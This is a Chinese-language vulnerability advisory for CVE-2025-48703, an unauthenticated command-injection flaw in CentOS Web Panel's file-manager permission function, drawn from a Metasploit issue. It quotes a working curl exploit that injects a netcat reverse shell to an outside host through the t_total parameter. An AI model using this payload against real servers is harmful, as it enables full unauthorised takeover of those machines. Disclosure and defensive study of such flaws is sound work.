CentOS Web Panel 未授权远程代码执行漏洞

漏洞信息

漏洞名称: CentOS Web Panel 未授权远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2025-48703

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: CentOS Web Panel是一个广泛使用的Web管理面板,主要用于CentOS系统的服务器管理。它提供了文件管理、数据库管理、用户管理等功能,通常部署在企业级服务器上,以便管理员通过Web界面轻松管理系统。

该漏洞属于未授权远程代码执行类型,技术根源在于文件管理模块中的权限更改功能未能正确验证用户输入,导致攻击者可以通过构造特殊的HTTP请求,在未授权的情况下执行任意命令。具体来说,攻击者可以利用fileNamecurrentPath参数注入恶意命令,通过t_total参数执行这些命令。

此漏洞的安全风险极高,攻击者无需任何认证即可远程执行任意命令,可能导致服务器被完全控制,数据泄露,服务中断等严重后果。由于漏洞利用简单且无需用户交互,攻击者可以自动化地大规模利用此漏洞,对使用CentOS Web Panel的服务器构成严重威胁。

产品厂商: CentOS Web Panel

产品名称: CentOS Web Panel

来源: https://github.com/rapid7/metasploit-framework/issues/20344

类型: rapid7/metasploit-framework:github issues

来源概述

Summary

Unauthenticated remote code execution in CentOS Web Panel - CVE-2025-48703

Basic example

Working exploit:

1
2
$ curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'
$

Courtesy of https://fenrisk.com/rce-centos-webpanel

Motivation

Unauthenticated one-shot RCE on a popular web management panel is pretty cool.